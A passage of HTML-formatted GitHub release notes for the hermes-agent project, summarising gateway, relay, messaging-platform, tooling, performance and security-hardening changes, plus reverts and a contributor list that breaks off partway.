<li><strong>External drain coordination (safe-shutdown Phase 2)</strong>; suppress home-channel shutdown broadcast on flagged drains; persist in-flight transcript on restart/shutdown drain timeout; busy/idle readout for safe lifecycle actions (<a href="https://github.com/NousResearch/hermes-agent/pull/52937" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52937/hovercard">#52937</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54824/hovercard">#54824</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50312" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50312/hovercard">#50312</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50131/hovercard">#50131</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Default <code>restart_drain_timeout</code> to 0 to kill a systemd crash loop; self-heal a gateway stranded in draining/degraded (<a href="https://github.com/NousResearch/hermes-agent/pull/54066" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54066/hovercard">#54066</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55397/hovercard">#55397</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Relay (Phase 5 / 6)</h3>
<ul>
<li>Wake primitive (gateway side); going-idle / buffered-flip primitive; <code>passthrough_forward</code> over WS; multi-platform-per-agent identity + per-frame egress; forward stable instance id at self-provision; declare relevance policy to the connector (<a href="https://github.com/NousResearch/hermes-agent/pull/51595" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51595/hovercard">#51595</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51572" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51572/hovercard">#51572</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50702" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50702/hovercard">#50702</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52830" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52830/hovercard">#52830</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50772" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50772/hovercard">#50772</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51248" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51248/hovercard">#51248</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Authorize relay-delivered events by delivery, not <code>source.platform</code>; adopt <code>scope_id</code> wire key; purge platform-specific scope terminology (<a href="https://github.com/NousResearch/hermes-agent/pull/52306" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52306/hovercard">#52306</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55289" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55289/hovercard">#55289</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56016/hovercard">#56016</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
</ul>
<h3>Gateway core &amp; rendering</h3>
<ul>
<li>Typed send-error classification (<code>SendResult.error_kind</code>); per-platform <code>typing_indicator</code> toggle; per-category context breakdown in <code>/usage</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/50342" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50342/hovercard">#50342</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55394" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55394/hovercard">#55394</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55204" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55204/hovercard">#55204</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>API server: configurable concurrent-run cap to prevent DoS; scope run approvals by run id (<a href="https://github.com/NousResearch/hermes-agent/pull/50007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50007/hovercard">#50007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56129" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56129/hovercard">#56129</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>📱 Messaging Platforms</h2>
<ul>
<li><strong>Cron continuations</strong> — continuable cron jobs (thread-preferred continuation with DM-mirror fallback); flat in-channel continuable cron delivery for Slack; warn when gateway not running on cron create/list (<a href="https://github.com/NousResearch/hermes-agent/pull/52250" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52250/hovercard">#52250</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56254" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56254/hovercard">#56254</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51696" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51696/hovercard">#51696</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Telegram: configurable command menu + raised default cap so skills stay visible; gate rich draft previews separately; drain general send pool on pool timeout before retry (<a href="https://github.com/NousResearch/hermes-agent/pull/51716" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51716/hovercard">#51716</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52088" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52088/hovercard">#52088</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54121" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54121/hovercard">#54121</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>)</li>
<li>Slack: opt-in Block Kit rendering for agent messages; <code>--no-assistant</code> flag for manifest generation (<a href="https://github.com/NousResearch/hermes-agent/pull/56102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56102/hovercard">#56102</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51487" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51487/hovercard">#51487</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Discord: render reasoning as <code>-#</code> subtext via <code>display.reasoning_style</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/51168" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51168/hovercard">#51168</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Native WhatsApp media delivery via the Baileys bridge; Teams native <code>send_video</code>/<code>send_voice</code>/<code>send_document</code>; photon sidecar upgraded to spectrum-ts v8 with tapback correlation; Raft gateway setup wizard (<a href="https://github.com/NousResearch/hermes-agent/pull/53598" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53598/hovercard">#53598</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49308" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49308/hovercard">#49308</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53451" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53451/hovercard">#53451</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56230" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56230/hovercard">#56230</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Signal: AAC voice-note remux + shared markdown formatting (<a href="https://github.com/NousResearch/hermes-agent/pull/49530" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49530/hovercard">#49530</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Migrate slack/dingtalk/whatsapp/matrix/feishu/telegram/wecom/email/sms adapters to bundled (<a href="https://github.com/NousResearch/hermes-agent/pull/49408" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49408/hovercard">#49408</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔧 Tool System, Skills &amp; MCP</h2>
<ul>
<li>Blank Slate setup mode — minimal agent, opt in to everything (<a href="https://github.com/NousResearch/hermes-agent/pull/36733" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36733/hovercard">#36733</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MCP: config persistence attack surface hardened; block base_url exfil; keepalive for short-TTL sessions (see Security) — plus catalog &amp; UX carried from v0.17.0</li>
<li>Skills: <code>/learn</code> distillation (see Self-Improvement); <code>cloudflare-temporary-deploy</code> optional skill; creative-ideation v2.1.0 method library (<a href="https://github.com/NousResearch/hermes-agent/pull/50849" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50849/hovercard">#50849</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42402" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42402/hovercard">#42402</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>)</li>
<li>Kanban: task lifecycle plugin hooks (claimed/completed/blocked); typed block reasons + unblock-loop breaker; handoff freshness stamping (<a href="https://github.com/NousResearch/hermes-agent/pull/50349" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50349/hovercard">#50349</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52848" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52848/hovercard">#52848</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53973" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53973/hovercard">#53973</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Plugins: <code>ctx.profile_name</code> for session-agnostic profile access (<a href="https://github.com/NousResearch/hermes-agent/pull/50346" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50346/hovercard">#50346</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>LSP: PowerShellEditorServices language server; mem0 v3 API + OSS mode + update/delete tools (<a href="https://github.com/NousResearch/hermes-agent/pull/55930" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55930/hovercard">#55930</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15624/hovercard">#15624</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kartik-mem0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kartik-mem0">@kartik-mem0</a>)</li>
</ul>
<h2>⚡ Performance</h2>
<ul>
<li>Cold start: lazy-load gateway platform adapters; parse config + plugin manifests with libyaml <code>CSafeLoader</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/54448" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54448/hovercard">#54448</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54486" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54486/hovercard">#54486</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>State: merge FTS5 segments + <code>handoff_state</code> index to curb write-lock contention; single-pass <code>list_profiles</code> alias map + skill-count cache + event-loop offload (<a href="https://github.com/NousResearch/hermes-agent/pull/54752" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54752/hovercard">#54752</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54770" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54770/hovercard">#54770</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔒 Security &amp; Reliability</h2>
<ul>
<li>Harden MCP-config persistence attack surface; block cron <code>base_url</code> overrides that exfiltrate provider credentials; non-reusable sentinel for prefix secrets in file reads (<a href="https://github.com/NousResearch/hermes-agent/pull/50476" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50476/hovercard">#50476</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56196" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56196/hovercard">#56196</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54166/hovercard">#54166</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Redact Slack App-Level (<code>xapp-</code>) tokens; browser cloud-metadata floor on all backends (CDP non-local); re-check private-network guard after <code>browser_back</code> navigation; scope <code>/resume</code> and <code>/sessions</code> to caller origin (IDOR); <code>aiohttp</code> 3.14.1 CVE floor across lazy messaging paths + pin-drift guard (<a href="https://github.com/NousResearch/hermes-agent/pull/56227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56227/hovercard">#56227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52349" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52349/hovercard">#52349</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56526" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56526/hovercard">#56526</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56378" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56378/hovercard">#56378</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56237/hovercard">#56237</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claudlos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claudlos">@claudlos</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Cron reliability wave: fail closed when an unpinned job's provider drifts; run missed-grace jobs once instead of deferring forever; keep the ticker alive on <code>BaseException</code> + heartbeat-aware status; layer enabled MCP servers onto per-job toolsets; guard cron model-tool path + auto-resume loop breaker (<a href="https://github.com/NousResearch/hermes-agent/pull/51051" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51051/hovercard">#51051</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50062" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50062/hovercard">#50062</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50016/hovercard">#50016</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50117" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50117/hovercard">#50117</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56240/hovercard">#56240</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Windows: suppress console flashes + harden gateway restarts; prefer cmd npm shim on PATH fallback; respawn gateway windowless after GUI update; prefer managed node for whatsapp/desktop (<a href="https://github.com/NousResearch/hermes-agent/pull/52340" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52340/hovercard">#52340</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50398/hovercard">#50398</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52239" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52239/hovercard">#52239</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔁 Reverts (in-window, for the record)</h2>
<ul>
<li>cron job storage returned to per-profile (reverts <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4517607524" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/32117" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32117/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/32117">#32117</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4719892950" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/50993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50993/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/50993">#50993</a>); don't clone <code>auth.json</code> (duplicating OAuth grant causes sibling revocation); windows terminal-popup PRs rolled back; <code>prompt_caching.enabled</code> toggle backed out for re-evaluation (<a href="https://github.com/NousResearch/hermes-agent/pull/51116" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51116/hovercard">#51116</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51732" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51732/hovercard">#51732</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53853" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53853/hovercard">#53853</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56126" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56126/hovercard">#56126</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>👥 Contributors</h2>
<p><strong>381 people</strong> contributed to this release (via commits, co-author trailers, and salvaged PRs). Thank you, all of you.</p>
<h3>Core</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a> — release lead; MoA first-class, verification/goals, <code>/learn</code>, background review, security round, providers, the P0/P1 clean-sweep</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a> — desktop app (projects, memory graph, <code>/journey</code>, multi-terminal, composer refactor wave, pets, verification UX)</li>
</ul>
<h3>Top community contributors</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> — the P0/P1 backlog burn: cron reliability wave, state perf, security (cron credential-exfil), gateway/signal, TUI config — a huge share of the priority closures</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> — relay Phase 5/6, scale-to-zero / drain coordination, dashboard auth/keys, gateway hardening</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a> — CI/docker (unified jobs, faster builds, timings report)</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a> — Windows hardening (console flashes, npm shim, gateway restarts)</li>
</ul>
<h3>All contributors</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xDevNinja/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xDevNinja">@0xDevNinja</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsir0000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsir0000">@0xsir0000</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1RB/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1RB">@1RB</a>, @595650661, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaronlab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaronlab">@aaronlab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abchiaravalle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abchiaravalle">@abchiaravalle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adammatski1972/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adammatski1972">@adammatski1972</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/AetherAgents/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AetherAgents">@AetherAgents</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Afnath-max/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Afnath-max">@Afnath-max</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agt-user/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agt-user">@agt-user</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ahmadashfq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ahmadashfq">@ahmadashfq</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AhmetArif0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AhmetArif0">@AhmetArif0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AIalliAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AIalliAI">@AIalliAI</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aieng-abdullah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aieng-abdullah">@aieng-abdullah</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ailang323/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ailang323">@ailang323</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ailthrim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ailthrim">@ailthrim</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aj-nt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aj-nt">@aj-nt</a>,<br>
